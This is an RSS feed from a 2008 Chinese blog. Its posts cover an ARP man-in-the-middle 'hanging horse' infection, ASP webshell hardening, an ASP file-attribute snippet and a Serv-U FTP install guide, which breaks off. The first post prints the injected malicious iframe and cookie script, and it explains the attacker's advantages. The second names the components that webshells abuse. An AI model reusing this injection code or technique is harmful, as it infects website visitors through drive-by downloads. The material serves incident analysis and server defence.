﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>博客园-海纳百川，有容乃大</title><link>http://www.cnblogs.com/David-weihw/</link><description>善于总结，积累软财富</description><language>zh-cn</language><lastBuildDate>Mon, 08 Sep 2008 07:24:06 GMT</lastBuildDate><pubDate>Mon, 08 Sep 2008 07:24:06 GMT</pubDate><ttl>60</ttl><item><title>qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)</title><link>http://www.cnblogs.com/David-weihw/archive/2008/09/01/1280947.html</link><dc:creator>海纳百川</dc:creator><author>海纳百川</author><pubDate>Mon, 01 Sep 2008 01:47:00 GMT</pubDate><guid>http://www.cnblogs.com/David-weihw/archive/2008/09/01/1280947.html</guid><wfw:comment>http://www.cnblogs.com/David-weihw/comments/1280947.html</wfw:comment><comments>http://www.cnblogs.com/David-weihw/archive/2008/09/01/1280947.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnblogs.com/David-weihw/comments/commentRss/1280947.html</wfw:commentRss><trackback:ping>http://www.cnblogs.com/David-weihw/services/trackbacks/1280947.html</trackback:ping><description><![CDATA[<p align="right">&nbsp;</p>
<p><font face="Arial" color="#000000" size="2">&nbsp;&nbsp; 昨天小站被挂马了，每次打开都会自动弹出一个对话框，提示正准备安装...，然后就消失。查看页面的源文件会发现在代码的最后面被加上了<font style="font-size: 0px; color: #fff">9 ~0 ]* U9 N2 ^</font><br />
&lt;body&gt;<font style="font-size: 0px; color: #fff">" z% I9 o( h% [" ?' A</font><br />
&lt;iframe src="http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org" height=50 width=0&gt;&lt;/iframe&gt;<font style="font-size: 0px; color: #fff">8 y1 d8 M) l% D* @; E</font><br />
&lt;script language="javascript"&gt;<font style="font-size: 0px; color: #fff">9 q+ }/ {- y* U/ z</font><br />
var expires = new Date();expires.setTime(expires.getTime() + 7*24*60*60*1000);document.cookie="vovo=123456test;expires="+expires.toGMTString();<font style="font-size: 0px; color: #fff">+ X- O8 ~8 `. }</font><br />
&lt;/script&gt;<font style="font-size: 0px; color: #fff">5 T% t&nbsp;&nbsp;h' P" z</font><br />
&lt;/body&gt;<font style="font-size: 0px; color: #fff">! ~4 d&amp; |&nbsp;&nbsp;v+ A3 `- O' m' ]1 S</font><br />
这段代码。经过我和技术人员的一整天的辛苦查找，终于解决了。最终得出结论是，服务器被植入了木马程序，这样所在<a class="channel_keylink" href="http://www.mumu-home.cn/Article/wangluoxueyuan/fuwuqi/Index.html" target="_blank">服务器</a>上的所有站点均被挂马了，经查，结果跟我们推测的一模一样，而且中毒情况完全相同。下面是关于qqsafe病毒、arp网站挂马的原理剖析，奉献给需要的网友，希望被挂马的站长朋友能早日摆脱木马的困扰：</font></p>
<p><font face="Arial"><font size="2"><font color="#000000"><strong>以下是解决办法</strong>：</font></font></font></p>
<p><font face="Arial" color="#000000" size="2">不管是访问<a class="channel_keylink" href="http://www.mumu-home.cn/Article/wangluoxueyuan/fuwuqi/Index.html" target="_blank">服务器</a>上的任何网页，就连404的页面也会在&lt;html&gt;后加入： <br />
&lt;body&gt;<br />
&lt;iframe src="http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org" height=50 width=0&gt;&lt;/iframe&gt;<br />
&lt;script language="javascript"&gt;<br />
var expires = new Date();expires.setTime(expires.getTime() + 7*24*60*60*1000);document.cookie="vovo=123456test;expires="+expires.toGMTString();<br />
&lt;/script&gt;<br />
&lt;/body&gt;&nbsp; <br />
挂马的位置在html标记左右,上面这段恶意代码，它会每隔几秒加入代码，也就是说在输出具体的东西之前就被挂了，有时有有时又没有，不是网页源代码问题，也没有在网页源代码中加入恶意代码，即使重装<a class="channel_keylink" href="http://www.mumu-home.cn/Article/wangluoxueyuan/fuwuqi/Index.html" target="_blank">服务器</a>，格式化重分区过第一个硬盘，放上去网站没多久一样再会出现这种情况. <br />
<br />
<br />
首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网站的问题了.打开同<a class="channel_keylink" href="http://www.mumu-home.cn/Article/wangluoxueyuan/fuwuqi/Index.html" target="_blank">服务器</a>的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题. <br />
<br />
那么剩下的要么是IIS<a class="channel_keylink" href="http://www.mumu-home.cn/Article/jingdianwangwen/Index.html" target="_blank">自己</a>出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的). <br />
<br />
<br />
<strong>目的：通过arp欺骗来直接挂马</strong> <br />
<br />
优点:可以直接通过arp欺骗来挂马. <br />
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码 <br />
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码 <br />
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码. <br />
<br />
优点:1.可以不用获得目标主机的权限就可以直接在上面挂马 <br />
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句. <br />
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果. <br />
<br />
<br />
原理：arp中间人攻击，实际上相当于做了一次代理。 <br />
<br />
正常时候:&nbsp;A----&gt;B&nbsp;,A是访问的正常客户,B是要攻击的<a class="channel_keylink" href="http://www.mumu-home.cn/Article/wangluoxueyuan/fuwuqi/Index.html" target="_blank">服务器</a>,C是被我们控制的主机 <br />
arp中间人攻击时候:&nbsp;A----&gt;C----&gt;B <br />
B----&gt;C----&gt;A <br />
实际上,C在这里做了一次代理的作用 <br />
<br />
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如iframe...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.<br />
<br />
什么是ARP？ <br />
<br />
英文原义：Address&nbsp;Resolution&nbsp;Protocol&nbsp; <br />
<br />
中文释义：（RFC-826）地址解析协议&nbsp; <br />
<br />
局域网中，网络中实际传输的是&#8220;帧&#8221;，帧里面是有目标主机的MAC地址的。所谓&#8220;地址解析&#8221;就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址以保证通信的顺利进行。&nbsp; <br />
<br />
<br />
注解：简单地说，ARP协议主要负责将局域网中的32为IP地址转换为对应的48位物理地址，即网卡的MAC地址，比如IP地址为192.168.0.1网卡MAC地址为00-03-0F-FD-1D-2B。整个转换过程是一台主机先向目标主机发送包含IP地址信息的广播数据包，即ARP请求，然后目标主机向该主机发送一个含有IP地址和MAC地址数据包，通过MAC地址两个主机就可以实现数据传输了。&nbsp; <br />
<br />
<br />
应用：在安装了以太网网络适配器的计算机中都有专门的ARP缓存，包含一个或多个表，用于保存IP地址以及经过解析的MAC地址。在Windows中要查看或者修改ARP缓存中的信息，可以使用arp命令来完成，比如在Windows&nbsp;XP的命令提示符窗口中键入&#8220;arp&nbsp;-a&#8221;或&#8220;arp&nbsp;-g&#8221;可以查看ARP缓存中的内容；键入&#8220;arp&nbsp;-d&nbsp;IPaddress&#8221;表示删除指定的IP地址项（IPaddress表示IP地址）。arp命令的其他用法可以键入&#8220;arp&nbsp;/?&#8221;查看到。</font></p>
<p><font face="Arial" size="2"></font>&nbsp;</p>
<p><font face="Arial" size="2">摘自：<font size="2">木木家园</font></font></p>
<img src ="http://www.cnblogs.com/David-weihw/aggbug/1280947.html?type=1" width = "1" height = "1" /><br><br><a href="http://news.cnblogs.com/n/42144/" target="_blank">[新闻]千亿美元市值榜:微软居首移动第二 诺基亚退榜</a>]]></description></item><item><title>ASP漏洞防范（转）</title><link>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260131.html</link><dc:creator>海纳百川</dc:creator><author>海纳百川</author><pubDate>Mon, 04 Aug 2008 06:36:00 GMT</pubDate><guid>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260131.html</guid><wfw:comment>http://www.cnblogs.com/David-weihw/comments/1260131.html</wfw:comment><comments>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260131.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnblogs.com/David-weihw/comments/commentRss/1260131.html</wfw:commentRss><trackback:ping>http://www.cnblogs.com/David-weihw/services/trackbacks/1260131.html</trackback:ping><description><![CDATA[<p>&nbsp;</p>
<p>我们不难看出一般ASP木马、Webshell主要利用了以下几类ASP组件： <br />
<br />
① WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8) <br />
<br />
② WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B) <br />
<br />
③ WScript.Network (classid:093FF999-1EA0-4079-9525-9614C3504B74) <br />
<br />
④ WScript.Network.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74) <br />
<br />
⑤ FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228) <br />
<br />
⑥ Adodb.stream (classid:{00000566-0000-0010-8000-00AA006D2EA4}) <br />
<br />
⑦ Shell.applicaiton.... <br />
<br />
这下我们清楚了危害我们WEB SERVER IIS的最罪魁祸首是谁了!!开始操刀,come on... <br />
<br />
2:解决办法： <br />
<br />
① 删除或更名以下危险的ASP组件： <br />
<br />
WScript.Shell、WScript.Shell.1、Wscript.Network、Wscript.Network.1、adodb.stream、Shell.application <br />
<br />
开始-------＞运行---------＞Regedit，打开注册表编辑器，按Ctrl+F查找，依次输入以上Wscript.Shell等组件名称以及相应的ClassID，然后进行删除或者更改名称(这里建议大家更名，如果有部分网页ASP程序利用了上面的组件的话呢，只需在将写ASP代码的时候用我们更改后的组件名称即可正常使用。当然如果你确信你的ASP程序中没有用到以上组件，还是直 <br />
<br />
接删除心中踏实一些^_^,按常规一般来说是不会做到以上这些组件的。删除或更名后，iisreset重启IIS后即可升效。) <br />
<br />
[注意：由于Adodb.Stream这个组件有很多网页中将用到，所以如果你的服务器是开虚拟主机的话，建议酢情处理。] <br />
<br />
② 关于 File System Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)即常说的FSO的安全问题，如果您的服务器必需要用到FSO的话，(部分虚拟主机服务器一般需开FSO功能)可以参照本人的另一篇关于FSO安全解决办法的文章:Microsoft Windows 2000 Server FSO 安全隐患解决办法。如果您确信不要用到的话，可以直接反注册此组件即可。 <br />
<br />
③ 直接反注册、卸载这些危险组件的方法：(实用于不想用①及②类此类烦琐的方法) <br />
<br />
卸载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%\system32\WSHom.Ocx <br />
<br />
卸载FSO对象,在cmd下或直接运行：regsvr32.exe /u %windir%\system32\scrrun.dll <br />
<br />
卸载stream对象,在cmd下或直接运行： regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll" <br />
<br />
如果想恢复的话只需要去掉 /U 即可重新再注册以上相关ASP组件例如：regsvr32.exe %windir%\system32\scrrun.dll <br />
<br />
④ 关于Webshell中利用set domainObject = GetObject("WinNT://.")来获取服务器的进程、服务以及用户等信息的防范，大家可以将服务中的Workstation[提供网络链结和通讯]即Lanmanworkstation服务停止并禁用即可。此处理后，Webshell显示进程处将为空白。 <br />
<br />
3 按照上1、2方法对ASP类危险组件进行处理后，用阿江的asp探针测试了一下,"服务器CPU详情"和"服务器操作系统"根本查不到,内容为空白的。再用海洋测试Wsript.Shell来运行cmd命令也是提示Active无法创建对像。大家就都可以再也不要为ASP木马危害到服务器系统的安全而担扰了。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<img src ="http://www.cnblogs.com/David-weihw/aggbug/1260131.html?type=1" width = "1" height = "1" /><br><br><a href="http://news.cnblogs.com/n/42142/" target="_blank">[新闻]Google申请“海上数据中心”专利 可能付诸行动</a>]]></description></item><item><title>ASP 修改文件的属性——把文件的由可读修改为只读</title><link>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260127.html</link><dc:creator>海纳百川</dc:creator><author>海纳百川</author><pubDate>Mon, 04 Aug 2008 06:32:00 GMT</pubDate><guid>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260127.html</guid><wfw:comment>http://www.cnblogs.com/David-weihw/comments/1260127.html</wfw:comment><comments>http://www.cnblogs.com/David-weihw/archive/2008/08/04/1260127.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnblogs.com/David-weihw/comments/commentRss/1260127.html</wfw:commentRss><trackback:ping>http://www.cnblogs.com/David-weihw/services/trackbacks/1260127.html</trackback:ping><description><![CDATA[<p>&lt;%<br />
&nbsp; 'Normal&nbsp;&nbsp; 0&nbsp;&nbsp; 普通文件。没有设置任何属性。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'ReadOnly&nbsp;&nbsp; 1&nbsp;&nbsp; 只读文件。可读写。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'Hidden&nbsp;&nbsp; 2&nbsp;&nbsp; 隐藏文件。可读写。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'System&nbsp;&nbsp; 4&nbsp;&nbsp; 系统文件。可读写。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'Volume&nbsp;&nbsp; 8&nbsp;&nbsp; 磁盘驱动器卷标。只读。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'Directory&nbsp;&nbsp; 16&nbsp;&nbsp; 文件夹或目录。只读。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'Archive&nbsp;&nbsp; 32&nbsp;&nbsp; 上次备份后已更改的文件。可读写。&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 'Alias&nbsp;&nbsp; 64&nbsp;&nbsp; 链接或快捷方式。只读。&nbsp;&nbsp;&nbsp; </p>
<p>Dim fso,f&nbsp; <br />
&nbsp;<br />
Set&nbsp;&nbsp; fso =&nbsp; CreateObject("Scripting.FileSystemObject")&nbsp;&nbsp; <br />
Set&nbsp;&nbsp; f&nbsp;&nbsp; =&nbsp; fso.GetFile("D:\WebSite\NNbrank.com\html\news\20088\83195.htm") <br />
&nbsp;<br />
if&nbsp; f.attributes &lt;&gt; 1 then<br />
&nbsp;&nbsp;&nbsp; f.attributes = 1<br />
end if </p>
<p>%&gt;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<img src ="http://www.cnblogs.com/David-weihw/aggbug/1260127.html?type=1" width = "1" height = "1" /><br><br><a href="http://news.cnblogs.com/n/42142/" target="_blank">[新闻]Google申请“海上数据中心”专利 可能付诸行动</a>]]></description></item><item><title>SERV-U 7 的安装和基本使用方法教程</title><link>http://www.cnblogs.com/David-weihw/archive/2008/06/27/1230945.html</link><dc:creator>海纳百川</dc:creator><author>海纳百川</author><pubDate>Fri, 27 Jun 2008 02:20:00 GMT</pubDate><guid>http://www.cnblogs.com/David-weihw/archive/2008/06/27/1230945.html</guid><wfw:comment>http://www.cnblogs.com/David-weihw/comments/1230945.html</wfw:comment><comments>http://www.cnblogs.com/David-weihw/archive/2008/06/27/1230945.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnblogs.com/David-weihw/comments/commentRss/1230945.html</wfw:commentRss><trackback:ping>http://www.cnblogs.com/David-weihw/services/trackbacks/1230945.html</trackback:ping><description><![CDATA[<h2>&nbsp;</h2>
<h2>&nbsp;SERV-U 7 的安装和基本使用方法教程</h2>
<div class="t_msgfont" id="postmessage_7292835"><br />
&nbsp;&nbsp;<br />
<font face="Times New Roman ">Serv-u7</font><font face="宋体 ">和以前的版本不同，不但使用界面和以往的不同，<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B9%A6%C4%DC">功能</span>也增加了不少。下面由我们英拓<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%CD%F8%C2%E7">网络</span>为大家做个安装与基本使用教程，方便新手上路。（本文只针对初级<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%D3%C3%BB%A7">用户</span>）</font><br />
<font face="Times New Roman "></font><br />
<font face="宋体 ">下面开始安装软件，这个版本已经带上了中文，选择你要安装的语言版本，这里我选择中文。</font><br />
<br />
<br />
<font face="宋体 "><span id="attach_256247" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 622px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <img onmouseover="attachimginfo(this, 'attach_256247', 1);attachimg(this, 'mouseover')" onmouseout="attachimginfo(this, 'attach_256247', 0, event)" alt="" src="http://www.discuz.net/attachments/month_0805/20080507_576f5011ecaf596ad3e7WEy7gdfQGQx8.jpg" onload="attachimg(this, 'load')" border="0" /> </font><br />
<font face="宋体 "></font><br />
<font face="宋体 "></font><br />
<font face="宋体 ">和以前一样的安装界面。</font><br />
<font face="宋体 "><span id="attach_256248" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256248', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_3a6a6bded7f40a6b44beVoLavZdAqeH9.jpg')" onmouseout="attachimginfo(this, 'attach_256248', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_3a6a6bded7f40a6b44beVoLavZdAqeH9.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">选择&#8220;我同意&#8221;，进入下一步。</font><br />
<font face="宋体 "><span id="attach_256249" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256249', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_6e8a3e45368c0e542ce1yKLsQHH6POX1.jpg')" onmouseout="attachimginfo(this, 'attach_256249', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_6e8a3e45368c0e542ce1yKLsQHH6POX1.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">选择你要安装的路径</font><br />
<font face="宋体 "><span id="attach_256250" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256250', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_dc58d68a6b437cb9c52fGb8s7kXjEVHm.jpg')" onmouseout="attachimginfo(this, 'attach_256250', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_dc58d68a6b437cb9c52fGb8s7kXjEVHm.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">如果你对这个不了解那就默认吧。</font><br />
<font face="宋体 "><span id="attach_256251" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256251', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_853b247787981e422fb4gfYbhG8Jk4eM.jpg')" onmouseout="attachimginfo(this, 'attach_256251', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_853b247787981e422fb4gfYbhG8Jk4eM.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">如果你开了<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%CF%B5%CD%B3">系统</span>自带的防火墙就会有这样的<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%CC%E1%CA%BE">提示</span>，勾选上，下一步</font><br />
<font face="宋体 "><span id="attach_256252" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256252', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_65b5bb5308d8f1c677f4KPAZapDdHYKK.jpg')" onmouseout="attachimginfo(this, 'attach_256252', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_65b5bb5308d8f1c677f4KPAZapDdHYKK.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">点&#8220;完成&#8221;完成安装。</font><br />
<font face="宋体 "><span id="attach_256253" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256253', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_20f3b3ad22d9c8633e39DNjeLhxfqo9Z.jpg')" onmouseout="attachimginfo(this, 'attach_256253', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_20f3b3ad22d9c8633e39DNjeLhxfqo9Z.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">安装完后开始进行帐户的创建。首先要创建一个域，选择&#8220;是&#8221;</font><br />
<font face="宋体 "><span id="attach_256254" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256254', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_fd2e1bd6823c14e2810egw2Rx7KaQSnl.jpg')" onmouseout="attachimginfo(this, 'attach_256254', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_fd2e1bd6823c14e2810egw2Rx7KaQSnl.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">输入要创建的域的名称，随便输入一个进入下一步</font><br />
<font face="宋体 "><span id="attach_256255" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 3526px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256255', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_7d33aeb7b13250931002dEWaabchnUQj.jpg')" onmouseout="attachimginfo(this, 'attach_256255', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_7d33aeb7b13250931002dEWaabchnUQj.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><strong><font color="red"><font face="宋体 ">这步就是监听的端口，除了</font></font><font color="red"><font face="Times New Roman ">21</font></font></strong><strong><font color="red"><font face="宋体 ">端口其他都取消掉，不然的话如果你有</font></font><font color="red"><font face="Times New Roman ">IIS</font></font></strong><strong><font color="red"><font face="宋体 ">，站点就启动不起来了。</font></font></strong><br />
<strong><font color="red"><font face="宋体 "><span id="attach_256256" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256256', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_66431f77fa92e996946bjeUsrP8RPNjt.jpg')" onmouseout="attachimginfo(this, 'attach_256256', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_66431f77fa92e996946bjeUsrP8RPNjt.jpg.thumb.jpg" border="0"  alt="" /></a> </font></font></strong><br />
<strong><br />
</strong><br />
<strong><br />
</strong><br />
<strong><br />
</strong><br />
<font color="red"><font face="宋体 "><font color="#000000"><font face="Times New Roman ">IP</font><font face="宋体 "><span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B5%D8%D6%B7">地址</span><span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%BD%A8%D2%E9">建议</span>留空，除非你要指定<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B7%FE%CE%F1%C6%F7">服务器</span></font><font face="Times New Roman ">IP</font><font face="宋体 ">。点&#8220;完成&#8221;。</font></font><br />
<font color="#000000"><font face="宋体 "><span id="attach_256257" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256257', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_d390faed19f9306e7a5bnUogXbtIS0au.jpg')" onmouseout="attachimginfo(this, 'attach_256257', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_d390faed19f9306e7a5bnUogXbtIS0au.jpg.thumb.jpg" border="0"  alt="" /></a> </font></font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><font face="宋体 "><font face="宋体 ">如果你想马上创建用户的话就点&#8220;是&#8221;。这里我就点&#8220;否&#8221;忽略掉了，我这里进行后期创建。</font><br />
<font face="宋体 "><span id="attach_256258" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256258', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_70c7d156ca784f6af644yCd42YZHBLzh.jpg')" onmouseout="attachimginfo(this, 'attach_256258', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_70c7d156ca784f6af644yCd42YZHBLzh.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">这里就是</font><font face="Times New Roman ">serv-u</font><font face="宋体 ">的管理界面。</font><br />
<font face="宋体 "><span id="attach_256259" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256259', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_cd346c2d327ff5230de0Cwd9nsbfCd62.jpg')" onmouseout="attachimginfo(this, 'attach_256259', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_cd346c2d327ff5230de0Cwd9nsbfCd62.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">下面进行</font><font face="Times New Roman ">FTP</font><font face="宋体 ">用户的创建。</font><br />
<font face="宋体 ">点用户下的&#8220;创建、修改和<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%C9%BE%B3%FD">删除</span>用户帐户&#8221;会出现以下界面。</font><br />
<span id="attach_256260" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 5563px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256260', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_d0d7537c8d75776209f5HzbaBn03pjQa.jpg')" onmouseout="attachimginfo(this, 'attach_256260', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_d0d7537c8d75776209f5HzbaBn03pjQa.jpg.thumb.jpg" border="0"  alt="" /></a> <br />
<br />
<br />
<font face="宋体 ">在&#8220;用户信息&#8221;这里根据提示输入要创建的帐户相应的信息。</font><br />
<font face="宋体 "><span id="attach_256261" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256261', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_f89950a9cebc1acb64bcWwa8SBBZc0a4.jpg')" onmouseout="attachimginfo(this, 'attach_256261', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_f89950a9cebc1acb64bcWwa8SBBZc0a4.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<br />
<br />
